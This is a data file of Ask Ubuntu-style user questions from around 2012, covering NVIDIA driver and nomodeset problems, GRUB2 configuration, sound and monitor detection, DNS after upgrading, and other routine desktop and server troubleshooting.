140640	nvidia drivers and kernel update problems ( nomodeset )	i have the problem that i installed ( ubuntu 12.05 ) the nvidia cuda drivers 285.05.33 and everything worked fine but after an update of the kernel via the update manager to uname -v **linux zfmgpu 3.2.0-24-generic # 38-ubuntu smp tue may 1 16:18:50 utc 2012 x86_64 x86_64 x86_64 gnu/linux** i have the problem that on boot i only see corrupted graphics . i tried to reinstall the driver ( which builds the kernel module ) which worked but - > i can only boot the new kernel and have lightdm start perfectly by setting `` nomodeset '' in the grub menu . without this i see corrupted graphics output and it does not start . what can i do to correct this ? i am not a pro ! i am a bit lost what i can do can somebody explain why i need this `` nomodeset '' which was previously also not in the grub menu ... the modules which are loaded are : module size used by vesafb 13844 1 snd_hda_codec_hdmi 32474 4 ip6table_filter 12815 0 ip6_tables 27864 1 ip6table_filter iptable_filter 12810 0 ip_tables 27473 1 iptable_filter x_tables 29846 4 ip6table_filter , ip6_tables , iptable_filter , ip_tables snd_hda_codec_analog 97987 1 rfcomm 47604 0 bnep 18281 2 nvidia 11936165 40 bluetooth 180104 10 rfcomm , bnep parport_pc 32866 0 ppdev 17113 0 snd_hda_intel 33773 4 snd_hda_codec 127706 3 snd_hda_codec_hdmi , snd_hda_codec_analog , snd_hda_intel snd_seq_midi 13324 0 snd_rawmidi 30748 1 snd_seq_midi snd_hwdep 13668 1 snd_hda_codec snd_pcm 97188 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec nouveau 774571 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_seq 61896 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14540 3 snd_seq_midi , snd_rawmidi , snd_seq ttm 76949 1 nouveau snd 78855 18 snd_hda_codec_hdmi , snd_hda_codec_analog , snd_hda_intel , snd_hda_codec , snd_rawmidi , snd_hwdep , snd_pcm , snd_seq , snd_timer , snd_seq_device drm_kms_helper 46978 1 nouveau drm 242038 3 nouveau , ttm , drm_kms_helper soundcore 15091 1 snd i2c_algo_bit 13423 1 nouveau i7core_edac 28102 0 snd_page_alloc 18529 2 snd_hda_intel , snd_pcm mxm_wmi 12979 1 nouveau edac_core 53746 1 i7core_edac video 19596 1 nouveau asus_atk0110 18078 0 mac_hid 13253 0 wmi 19256 1 mxm_wmi lp 17799 0 parport 46562 3 parport_pc , ppdev , lp firewire_ohci 41000 0 firewire_core 63558 1 firewire_ohci usbhid 47199 0 crc_itu_t 12707 1 firewire_core r8169 62099 0 hid 99559 1 usbhid maybe that helps somebody ! what is nouveau ?
140642	how can i know whether a sound card is present on my system or not ?	i 'm running ubuntu 12.04 gnome classic . obviously playing the music shows there is a sound card present . but i 've read that there might be multiple sound cards present on a single system . how can i know how many sound cards are present on my system ? also , how can i know which all they are ?
140648	grub2 wo n't show any graphical menu	i recently installed ubuntu on my system , and since my previous grub2 installation was messy , i decided to reinstall grub2 in this ubuntu partition . anyway it did n't totally work : grub-install did n't give any error , yet on reboot , grub does n't show its menu , but only its command line . i can manage to boot all the oses on my computer from there , but it 's something i 'd like to avoid in the long term ( typing 4 lines of code , with an american keymap is slightly slower than scrolling to a specific entry ) . i have tried various settings of grub_terminal , but i did n't get any change . there is no error message that i can see before the command line prompt , only grub command introduction message . here is my /boot/grub/grub.cfg : # # do not edit this file # # it is automatically generated by grub-mkconfig using templates # from /etc/grub.d and settings from /etc/default/grub # # # # begin /etc/grub.d/00_header # # # if [ -s $ prefix/grubenv ] ; then set have_grubenv=true load_env fi set default= '' debian gnu/linux , with linux 3.0.1-3.fc14.i686 ( on /dev/sda5 ) '' if [ `` $ { prev_saved_entry } '' ] ; then set saved_entry= '' $ { prev_saved_entry } '' save_env saved_entry set prev_saved_entry= save_env prev_saved_entry set boot_once=true fi function savedefault { if [ -z `` $ { boot_once } '' ] ; then saved_entry= '' $ { chosen } '' save_env saved_entry fi } function recordfail { set recordfail=1 if [ -n `` $ { have_grubenv } '' ] ; then if [ -z `` $ { boot_once } '' ] ; then save_env recordfail ; fi ; fi } function load_video { insmod vbe insmod vga insmod video_bochs insmod video_cirrus } insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos7 ) ' search -- no-floppy -- fs-uuid -- set=root b34ab83e-0c3a-4671-bcd5-786b37622389 if loadfont /usr/share/grub/unicode.pf2 ; then set gfxmode=800x600x24 load_video insmod gfxterm insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos7 ) ' search -- no-floppy -- fs-uuid -- set=root b34ab83e-0c3a-4671-bcd5-786b37622389 set locale_dir= ( $ root ) /boot/grub/locale set lang=fr_fr insmod gettext fi terminal_input console terminal_output gfxterm if [ `` $ { recordfail } '' = 1 ] ; then set timeout=-1 else set timeout=10 fi # # # end /etc/grub.d/00_header # # # # # # begin /etc/grub.d/05_debian_theme # # # set menu_color_normal=white/black set menu_color_highlight=black/light-gray if background_color 44,0,30 ; then clear fi # # # end /etc/grub.d/05_debian_theme # # # # # # begin /etc/grub.d/10_linux # # # function gfxmode { set gfxpayload= '' $ 1 '' if [ `` $ 1 '' = `` keep '' ] ; then set vt_handoff=vt.handoff=7 else set vt_handoff= fi } if [ $ { recordfail } ! = 1 ] ; then if [ -e $ { prefix } /gfxblacklist.txt ] ; then if hwmatch $ { prefix } /gfxblacklist.txt 3 ; then if [ $ { match } = 0 ] ; then set linux_gfx_mode=keep else set linux_gfx_mode=text fi else set linux_gfx_mode=text fi else set linux_gfx_mode=keep fi else set linux_gfx_mode=text fi export linux_gfx_mode if [ `` $ linux_gfx_mode '' ! = `` text '' ] ; then load_video ; fi menuentry 'ubuntu , avec linux 3.2.0-24-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos7 ) ' search -- no-floppy -- fs-uuid -- set=root b34ab83e-0c3a-4671-bcd5-786b37622389 linux /boot/vmlinuz-3.2.0-24-generic-pae root=uuid=b34ab83e-0c3a-4671-bcd5-786b37622389 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-24-generic-pae } menuentry 'ubuntu , avec linux 3.2.0-24-generic-pae ( mode de dépannage ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos7 ) ' search -- no-floppy -- fs-uuid -- set=root b34ab83e-0c3a-4671-bcd5-786b37622389 echo 'chargement de linux 3.2.0-24-generic-pae ... ' linux /boot/vmlinuz-3.2.0-24-generic-pae root=uuid=b34ab83e-0c3a-4671-bcd5-786b37622389 ro recovery nomodeset echo 'chargement du disque mémoire initial ... ' initrd /boot/initrd.img-3.2.0-24-generic-pae } submenu `` previous linux versions '' { menuentry 'ubuntu , avec linux 3.2.0-23-generic-pae ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail gfxmode $ linux_gfx_mode insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos7 ) ' search -- no-floppy -- fs-uuid -- set=root b34ab83e-0c3a-4671-bcd5-786b37622389 linux /boot/vmlinuz-3.2.0-23-generic-pae root=uuid=b34ab83e-0c3a-4671-bcd5-786b37622389 ro quiet splash $ vt_handoff initrd /boot/initrd.img-3.2.0-23-generic-pae } menuentry 'ubuntu , avec linux 3.2.0-23-generic-pae ( mode de dépannage ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os { recordfail insmod gzio insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos7 ) ' search -- no-floppy -- fs-uuid -- set=root b34ab83e-0c3a-4671-bcd5-786b37622389 echo 'chargement de linux 3.2.0-23-generic-pae ... ' linux /boot/vmlinuz-3.2.0-23-generic-pae root=uuid=b34ab83e-0c3a-4671-bcd5-786b37622389 ro recovery nomodeset echo 'chargement du disque mémoire initial ... ' initrd /boot/initrd.img-3.2.0-23-generic-pae } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/20_memtest86+ # # # menuentry `` memory test ( memtest86+ ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos7 ) ' search -- no-floppy -- fs-uuid -- set=root b34ab83e-0c3a-4671-bcd5-786b37622389 linux16 /boot/memtest86+.bin } menuentry `` memory test ( memtest86+ , serial console 115200 ) '' { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos7 ) ' search -- no-floppy -- fs-uuid -- set=root b34ab83e-0c3a-4671-bcd5-786b37622389 linux16 /boot/memtest86+.bin console=ttys0,115200n8 } # # # end /etc/grub.d/20_memtest86+ # # # # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sda1 ) '' -- class windows -- class os { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 9cdc9835dc980c20 chainloader +1 } menuentry `` windows recovery environment ( loader ) ( on /dev/sda2 ) '' -- class windows -- class os { insmod part_msdos insmod fat set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set=root 8299-11dd drivemap -s ( hd0 ) $ { root } chainloader +1 } menuentry `` debian gnu/linux , with linux 3.0.1-3.fc14.i686 ( on /dev/sda5 ) '' -- class gnu-linux -- class gnu -- class os { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 3065baea-4365-4203-876f-6cf898dcd3a6 linux /boot/vmlinuz-3.0.1-3.fc14.i686 root=/dev/sda5 ro quiet } menuentry `` debian gnu/linux , with linux 3.0.1-3.fc14.i686 ( recovery mode ) ( on /dev/sda5 ) '' -- class gnu-linux -- class gnu -- class os { insmod part_msdos insmod ext2 set root= ' ( hd0 , msdos5 ) ' search -- no-floppy -- fs-uuid -- set=root 3065baea-4365-4203-876f-6cf898dcd3a6 linux /boot/vmlinuz-3.0.1-3.fc14.i686 root=/dev/sda5 ro single } # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # and here is my /etc/default/grub : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default= '' debian gnu/linux , with linux 3.0.1-3.fc14.i686 ( on /dev/sda5 ) '' # grub_hidden_timeout= '' 0 '' grub_hidden_timeout_quiet= '' true '' grub_timeout= '' 10 '' grub_distributor= '' `lsb_release -i -s 2 > /dev/null || echo debian` '' grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal= '' console '' grub_terminal_input= '' console '' grub_terminal_output= '' gfxterm '' # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' grub_gfxmode= '' 800x600x24 '' # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid= '' true '' # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' is there any part of the configuration process that i missed ? grub has always worked out of the box in the past , at least when installed in ubuntu , so that 's highly possible . thanks in advance , edit : using aptitude to redownload and reinstall grub fixed the issue now . but still i 'd like to know what was causing the issue .
140650	how should usb stick in lion for 12.04 be formatted initially ?	to create an ubuntu 12.04 lts usb stick in mac os x lion , how should be the stick formatted initially ?
140652	12.04 desktop login loop	i installed 12.04 from cd in a partition where 8. ? ? had been working . the installation appeared fine but ubuntu booted to a black screen . after updating packages and fighting with nvidia drivers for a while i now have a login screen . if i log in using my password the screen goes black for a few seconds and then returns to the login screen . if i choose the guest session i get a black screen with a mouse pointer . ctrl+alt+f1 works and i can log in , but many of the suggestions in previous answers either have no effect on the problem or fail with messages like : client failed to connect to the d-bus daemon invalid mit-magic-cookie-1 x11 initialization failed is there a known way to get from here to a working system ? i 'd like to avoid reinstalling because my internet connection is slow , and the original installation seemed ok .
140654	how can i test if input device ( mic ) is detected ?	my friend 's ubuntu 12.04 is installed with wubi and there is no input device in sound settings . is there a command to see if there is something visible for the system or a fix for this ? it is a laptop - msi x360
140657	remembering window positions in ubuntu 12.04	is it possible to install something which makes ubuntu 12.04 remember the positions of windows and restore those positions if a window/application is closed and re-opened ? i am aware that ubuntu itself does not do this out of the box and will not do it . i 'm happy to install some third-party app which does this , or perhaps write something third-party using a tool ( devilspie ? ) , as long as it works with core ubuntu 12.04 using the standard unity desktop ( that is : shifting to a different desktop or leaving unity is not an acceptable option for this question ) . i 'd be interested primarily in answers which also give some indication of whether they 're likely to continue to work in later versions of ubuntu , and whether they 're working with or against the direction in which unity is heading ( for example , if a suggested solution uses a compiz extension , will that compiz extension continue to work with unity , in your estimation ? ) this question was asked and answered for ubuntu 10.04 which did have such a remember-window-positions feature ; ubuntu 12.04 does not , so this is not a duplicate .
140659	how can i fix a very broken ubuntu installation without losing data ?	okay guys , i was installing a program ( i do not remember the name ) . when i did sudo apt-get update i was given missing dependencies . it told me to sudo apt-get install -f which deleted just about every dependency needed for ubuntu , now i can not log in or anything , now in grub it actually says debian instead of ubuntu . i have tons of important data in that partition . can i some how use the live cd to fix this problem ? ? ? i mean like re-install without losing data . any help is greatly appreciated ! ! !
140660	hotkeys to focus generic window in gnome	is there a way to use hotkeys to focus on a window not determined by its program name ? let 's say there are nine program tabs open : terminal , eclipse and seven chrome windows . currently , i am just clicking with the mouse in the lower desktop section to change focus . what i would like to do is use keys like super+0 , super+1 , super+2 and so on change focus . i know there is alt-tab and also super-w , which are convenient but not quite what i am looking for . this is on 10.04 , but would consider switching to 12.04 if it can do it .
140661	how can i run `` video for everybody '' in current ubuntu ( i.e . without specially compiling the latest ffmpeg ) ?	i first asked `` how do i convert a video to all formats neccesary for video for everybody '' on super user . the answer involved compiling the latest ffmpeg . later , i asked `` how do i strip the metadata from a quicktime file '' here on ask ubuntu . the answer to that does n't work for me , because now i 've got the latest ffmpeg compiled in my ubuntu . so how do i convert to all the formats necessary using ubuntu 's old ffmpeg ( or mencoder or some other cli answer ) ?
140663	ubuntu not detecting second monitor	i 'm running ubuntu 12.04 on a lenovo x61s thinkpad . as the screen 's rather small and i want to do some video editing , i thought i 'd plug in a monitor and use that . the monitor is relisys jm777 ( quite old ) . when i plug it into my other computer , which is running windows 7 , it immediately mirrors the display ; but when plugged into the lenovo the monitor screen remains blank . the graphics card on the lenovo is a `` vga compatible controller '' according to sysinfo . anybody got any suggestions ? i 'm quite new to linux , so simple explanations would be greatly appreciated . the contents of my xorg.0.log file can be seen at http : //paste.ubuntu.com/1009855/ .
140668	broken file permissions when using ubuntu as guest system ( vmware )	i 'm using ubuntu as guest system on my vmware and i 've got following problem : if i copy files from the host system ( windows ) into the shared folder sometimes it happens that the file permissions are broken . $ ls -l my/path/to/whatever drwxrwxrwx 1 user group 4096 mai 22 11:57 myfolder - ? ? ? ? ? ? ? ? ? ? ? ? ? ? myimage.png the only way to fix that is to remount the shared folder but that 's suboptimal
140669	how to move window controls to the left in kde ?	months of using unity has trained me to look for window controls on the left topside of the windows . unfortunately , kde desktop puts the window controls on the right side and i do n't like it there . is it possible to move it to the left side ?
140680	vlc does not inhibit screen blanking	i have an issue which could be a bug , but before reporting it , i want to make sure i 'm not doing something wrong . when watching a movie with vlc on fullscreen , approximately in 10 minutes the screen goes blank . this happens despite having the `` inhibit the power management daemon during playback '' option checked . this even happens when i go to the ubuntu 's system settings > brightness and lock and set the `` turn screen off when inactive for : `` to `` never '' . ( actually , no matter what value i set it to , the screen always goes blank after 10 minutes or so ) . the only way i managed to disable the screen blanking is using the command line utility xset : xset -dpms and xset s off ( it 's possible only one of these is necessary ) . now , one thing that could possibly cause this is that i removed both gnome-screensaver and xscreensaver packages , because i 'm not using screensaver . i only use the power-management to blank the screen ( i assume it 's different thing than screensaver , but i might be wrong ) . when no vlc us running , the screen blanking works normally even without those packages . that is , the screen goes blank after whatever timeout i set in the brightness and lock settings . only when vlc is playng ( and possibly only when in fullscreen ) , this issue occurs . so my question is : is this a bug in vlc ( or elsewhere in ubuntu ) , or should i install back gnome-screensaver and/or xscreensaver to make it work correctly again ? i have ubuntu 12.04 .
140686	i can not download anything ie . msn or pokerstarsany ideas ?	when i try to download anything it says ; an error occurred when loading the archive archive : /tmp/wlsetup-web-2.exe [ /tmp/wlsetup-web-2.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /tmp/wlsetup-web-2.exe or /tmp/wlsetup-web-2.exe.zip , and can not find /tmp/wlsetup-web-2.exe.zip , period .
140688	upgraded server to 12.04 dns no longer working	i can not ping/reach any website/service by name ( e.g . ping google.com ) . i could temporarily fix this by changing 127.0.0.1 to my router in /etc/resolv.conf but that file gets overwritten . how can i permanently fix this ? to be clear , i do n't need a dns server , i just want my server to be able to use dns from dhcp .
140696	using the zte mf192 hspa usb modem with network manager in ubuntu 12.04lts	has anyone been able to use the zte mf192 hspa ( black ) modem with network manager ? if there 's a way , please share with the rest of us .
140697	how do i run lintian from pbuilder-dist ?	i am using pbuilder-dist to build my packages for debian unstable and ubuntu precise . i want to know how to run lintian ( and possibly other commands ) inside a certain chroot . i have ubuntu 12.04 on my machine .
140698	how to install ubuntu in windows 7 partition ?	i would like to try out the ubuntu on my hard drive . now , i have c : / as my windows 7 and d : / as my media files and so on . how can i best install ubuntu to try out and uninstall it if i do n't feel like it while it wo n't affect my files after i uninstall ubuntu ? i would like to dual boot with windows 7 . thanks !
140703	ca n't logout in ubuntu 12.04 x64 with nvidia drivers	i know more people with this issue : after we upgraded to 12.04 , we ca n't log out with nvidia drivers enabled , i got a blank screen , sometimes with fuzzy words ( like x server crash ) , and after some seconds the pc reboots . if i uninstall nvidia drivers , i can log out without problems . i ca n't find any fix , i have tried with current and current-updates . anyone have solved this ? it 's a bug ? thanks
140705	/usr/sbin/apache2 not found	i am trying to install and run apache2 , but after apt-get purge apache2 ; apt-get install apache2 ( as root ) , i am still missing the file /usr/sbin/apache2 i am running backtrack 5 rc 2 , which is a ubuntu devirate . how can i fix that ?
140708	chrome autostart on ubuntu	i have recently installed ubuntu on my pc , but i ca n't understand how to manage the applications -- as an example , i 'm trying to get chrome to autostart . i can start chrome manually , but i 'm not able to find the correct exe ( to make it autostart ) . how can i make this work ?
140714	why is n't the new `` postgres '' user i created showing up in user accounts ?	i just did a fresh install of ubuntu 12.04 on a dell inspiron 1545 , then downloaded & installed all the latest updates . now when i create a new user postgres in the `` user accounts ... '' window , it creates the account , but it 's not listed in the user accounts window . since it 's not listed , i am not able to create a password or `` enable '' the account so they can login . i have tried reinstalling ubuntu 12.04 thinking there might have been a bug during installation , but i got the same thing again . any ideas on how to fix this ?
140719	how would one change the gdm theme in ubuntu 12.04 ?	i am using gdm , not lightdm . none of the established gdm login theme changers work in precise . how can i change themes ? i ca n't use lightdm because it 's broken in 12.04 x64 ( or at least for me and some others ) .
140720	window and menu freezes after watching flash videos	i 've got a problem with a freezing desktop . after or while watching flash videos in firefox or chrome , all menus and windows are freezing temporarily , only keyboard is working . i can open new terminals and work there , but i ca n't close or move any window . i 'm using the recommended proprietary nvidia driver . do you have any idea ?
140721	how to synchronize multiple mail ( thunderbird ) accounts ?	i was wondering if the following setup is possible using ubuntu ( server ) and ubuntu ( workstation ) : i have two workstations with thunderbird as mail client i have one server on both workstations i want the mail to be synchronized so when i write an email it will appear in the `` sent '' folder of the second computer too . also when i am not near my workstation and login to the server ( remote ) i want to be able to write an email with the same result as above . i figured out that i need to install thunderbird on both workstations and on the server , then i need to link the mail file to all 3 clients . the question is `` how do i do that ? '' perhaps this question is answered before , in that case i am sorry for asking again . with kind regards , marchel . -edit- i found this on mozillazine : install thunderbird separately on each computer but store your profile on a portable usb device or on a network file share . to launch thunderbird with that profile , use the -profile `` path '' command line argument . is it just straightforward installing or is there something i need to beware of ? ( sorry for my bad english )
140722	find : missing argument to -exec	the following works from the terminal no problem find testdir -type f -exec md5sum { } \ ; where testdir is a directory that contains some files ( for example file1 , file2 and file3 ) . however , if i run this from a bash script or from java using something like runtime rt = runtime.getruntime ( ) ; process pr = rt.exec ( `` find testdir -type f -exec md5sum { } \\ ; '' ) ; i get the following error find : missing argument to `-exec' any ideas ? update : this was answered correctly over on stackoverflow . i will close the question here . http : //stackoverflow.com/questions/10704889/java-execute-command-line-program-find-returns-error
140727	fragments with recordmydesktop	i tried to record an screencast wih gtk-recordmydesktop . the sound quality is great but i get a lot of fragments in the video . its comes if i refresh an area like the browser windows . here is a screenshot : the settings are the same after the installation . nothing changed .
140728	is it possible to continue an ssh session upon each re-connection ?	i 'm running ubuntu 10.04 on a remote server . i 'd like to know if it 's possible to continue an ssh session upon each re-connection . i intend on running a server-application i wrote which has to be gracefully exited . i guess i could add a remote restart/stopping of the application but i 'd still need the real-time output . which is why having the ssh session continue upon re-connection would be really useful , if not crucial . thanks .
140731	how do i expand the /boot partition ?	i want to extend my /boot partition . df -h ( output ) : filesystem size used avail use % mounted on /dev/sda6 581g 251g 301g 46 % / udev 2.9g 4.0k 2.9g 1 % /dev tmpfs 1.2g 676k 1.2g 1 % /run none 5.0m 8.0k 5.0m 1 % /run/lock none 2.9g 140k 2.9g 1 % /run/shm /dev/sda1 92m 72m 15m 83 % /boot i want to expand my /boot partition to 500 mb . i welcome any kind of help/direction .
140735	how to set different wallpapers in ubuntu workspaces	i 'm having an issues trying to customize ubuntu workspaces in the gnome environment . assuming the default four workspaces aka desktops , how can one have a different wallpaper for each one ? when i go to an individual workspace to set its wallpaper , all of the workspaces use it . so if i set : wallpaper b on workspace 2 wallpaper c on workspace 3 what will happen is that all the workspaces will default to the last wallpaper set no matter which workspace it was set in . what 's even weirder is that the very first wallpaper set upon using it for the very first time is what shows up when i call up the workspaces tool . even though once i settle upon a workspace , no matter which one , the original wallpaper disappears and the last wallpaper set is the one that always shows up .
140739	ubuntu 12.04 has experienced an internal error	after updating samba i am getting this error when logged in as a user . does not occur as root . the details window runs unity-support-test but never stops . what is the error ?
140740	should i use pyqt or pyside for a new qt project ?	recently i 've been involved in conversations about creating a quickly template for a qt and qtquick ubuntu app . the idea is to make it as easy to develop qt apps from concept to package as it is right now with gtk , on which the ubuntu application quickly template is based . the intention is still to use python as the base programming language , and the first question that comes to mind is : which python bindings should we use pyqt or pyside ? i 'd like to hear from the folks experienced in both technologies what the pros and cons of each one are , how well maintaned each one is , how well mapped the qt api is to the bindings , etc . thanks !
140742	how do i change the desktop name on the unity panel ?	how do i change ubuntu desktop to xyz 's desktop .
140744	undo an update !	i updated my laptop ubuntu from 11.10 to 12.04 , and i like 11.10 much much better ! i originally put ubuntu on my lap top by cd so i was wondering if i could just reload it from the cd . will 12.04 be replaced with 11.10 if i did ? i would love to have 11.10 back !
140747	why does updating force the user to download complete cache packages	most of the time when i update my system , update manager downloads whole packages from the list . even if the package only changes in a few lines . what i mean is , for a 4mb package that has only for example 2kb lines changed , update manager downloads the whole 4mb . with my connection this is horrible since it takes very long ( remember i download between 10kb to 50kb most of the time ) . since there are several big packages , we could be talking between 2kb changes separated in 100mb of packages that i would have to download from scratch even though i had already downloaded them 24 hours ago for example . so why does a cache manager need to download the complete package again when all that has changed is one small part . more importantly , is there a way that i can tell it to verify the source package to see what has changed and securely download only the modified part ? i will add that this is apt-get , aptitude and synaptic also . all of them work the same way and when a 50 line of the package changes , i have to download the whole thing . is there a more efficient way of updating , a configuration , a parameter ?
140749	how do i make gdm use the upstream gnome theme ?	i have installed gnome 3.4 and according to gnome 3.4 , when i reconfigure my display manager to gdm i should get a login screen like this- but when i reconfigure my display manager to gdm my screen looks like this- why ? ? and how can i get the upper one ? ?
140753	how can i restore rhythmbox icon in bottom panel ?	i installed gnome-shell from the ubuntu gnome-shell remix ppa with ubuntu 12.04 . i tried rhythmbox and liked it . since i want to use my top right panel as a system manager ( halt , sound , battery and network only ) and my bottom right panel as my hidden app manager ( like the systray used to do ) i was happy to find a rhythmbox icon with a gnome-shell menu to manage my music and the software in my bottom panel . unluckily , i clicked on some sort of `` hide '' in this menu and i never saw my rhythmbox icon again . i would like to restore it , because rhythmbox does not exit when pressing the x button and then i ca n't manage it , i have to relaunch it . how can i restore this button ? i tried to remove the config files and reinstall but i do n't have this pretty useful icon . also , is there a way to change default applications in gnome-shell ? i ca n't find an option dialog for it like i had in xfce and ol'gnome .
140759	scale plugin keeps forgetting hot corner settings on restart	i 'm using ubuntu 12.04 with unity , which i suppose uses compiz as well . i have compiz settings manager , and make the top left and bottom left corners of my screen activate the `` scale '' ( like exposăš ) function to scale and show all windows . the problem is that when i restart the computer , the hot corners no longer do anything . i have to go back into compiz settings manager , delete the hot corner option , and then set it again . something seems to be overriding or deleting the compiz hot corner setting on restart . update : sometimes , the setting loses its footing even while the computer is running . i have n't figured out yet what triggers it .
140760	ubuntu 12.04 nvidia gtx 460 video card installation	currently testing ubuntu 12.04 x64 for our development team . after upgrading from 11.10 i 've been having video card issues . i 'm using nvidia geforce gtx 460 . when ever i try to launch nvidia x server i get the following error message . you do not appear to be using the nvidia x driver . please edit your x configuration > file ( just run nvidia-xconfig as root ) , and restart the x server . i 've tried running sudo nvidia-xconfig multiple times and rebooting with no success . i 've also tried getting the nvidia-current driver from the x-swat repo sudo apt-add-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current followed again by a reboot did nothing for me but knock my resolution down to 800x600 finally i 've tried sudo apt-get purge xserver-xorg sudo apt-get update sudo apt-get install xserver-xorg xserver-xorg-video-all sudo reboot does anyone have any thoughts or directions they could point me in ? to the best of my understanding my video card is suppose to be supported .
140761	what is the difference between deb packages and tar balls ? what are the advantages/disadvantages of each ?	i do n't know about tar balls . most packages are available in the tar ball forms but ubuntu packages are debian packages . what is the difference between deb packages and tar balls ? what are the advantages/disadvantages of each ?
140768	psensor only shows hdd and cpu usage , not temperature	okay i have psensor installed , i installed lm-sensor and some other related packages , i ran sensors-detect and did n't come up with anything . it is only showing my hdds , and my cpu usage not temperatures or anything like that . proc : processor : 3 vendor_id : authenticamd cpu family : 16 model : 4 model name : amd phenom ( tm ) ii x4 920 processor motherboard : handle 0x0001 , dmi type 1 , 27 bytes system information manufacturer : gigabyte technology co. , ltd . product name : ga-ma78gm-us2h i 'm pretty new to temperature sensors in linux , let alone fan sensors ( which i would like too ) . what am i doing wrong ?
140778	chrome or chromium browsers renders pixelated google fonts	i am a web developer and use google fonts intensively for creating web pages . just wondering why chrome or chromium browsers render google fonts from http : //www.google.com/webfonts poorly/pixeladed in ubuntu ? firefox and opera works fine . i had this problem since ubuntu 10.04 , now upgraded to 11.10 running gnome 3 ( same with other desktop environments ) . i see that chrome does n't have this problem windows xp or vista . here is the snapshot showing the problem . the font is google font called alex brush . http : //dl.dropbox.com/u/73855680/snapshots/poorly-rendered-google-fonts.png thank you .
140782	how can i capture text from my terminal without redirecting it to a text file ?	basically , what i would like to do is , instead of just redirecting the out from my terminal command to a file , i would like to have the information also show in the terminal session . if i use ~ $ command > output.log i am no longer able to see the command process in the terminal window and therefore i do not know when the command has finished processing without looking at the output.log file . the commands i run take a few minutes to process and produce quite a bit of output . ( hence me wanting to capture that output ) any suggestions ?
140785	gnu grub version 1.99-21ubuntu3 , does not work !	i 'm new to ubuntu , i installed it but when i try to start it , tells me that i need to run commands from bash-like and they can be shown by tab , when i press tab shows me the commands but then i type them and nothing happens , i have to reset my computer and the same thing goes on . this is what it says : gnu grub version 1.99-21ubuntu3 minimal bash-like line editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . and nothing happens from there , can you tell what i need to do now ? thanks again !
140786	suspend mode reset my configuration to internal microphone instead of keeping usb microphone as default	suspend mode reset my configuration to internal microphone instead of keeping usb microphone as default . i always have to manually change it back in the sounds parameters . reboot is ok : keeps the usb microphone as default . please help .
140787	intel i945gms driver for ubuntu 12.04	i ca n't find the proprietary driver of intel i945gms for ubuntu 12.04 ! does it exist for intel i945gms notebook integrated video ?
140791	duplicated icons with unity . particular case : matlab	to be honest , i do n't know what happened , it was working fine and now it does n't i do n't feel i have changed nothing . i have the .desktop file in .local/share/launchers . its code is : [ desktop entry ] type=application name=matlab comment=matlab exec=/usr/local/matlab/r2012a/bin/matlab -desktop icon=/home/kais3r/.local/share/launchers/matlab.png terminal=false categories=math ; ide ; startupnotify=true but i do n't think the problem is related to this . maybe some of the last updates ? i do n't know . the point is that now , when i run matlab from its launcher a second icon will show up . funny thing is that if i put the mouse on the new icon the text that appears onto it is not the one i have in my .desktop file , so my guess is that the launcher is launching the script but it is not capable of associating it with its icon , so it launches a secondary one . so far it only happened with matlab . any answer is welcome ! thanks !
140796	i downloaded 12.04 lts 64 bit at 698 mb but the finished download came in at 732.2 mb	i downloaded 12.04 lts 64 bit at 698 mb but the finished download came in at 732.2 mb . is this file corrupted ? i tried to verify the file in disk utility but it said there was no checksum to check . i was going to run ubuntu in a virtualbox as one of my virtual machines but i did n't want to run a compromised iso . i have an intel i5 macbook pro 8 g ram . will this version run in virtualbox on my computer ?
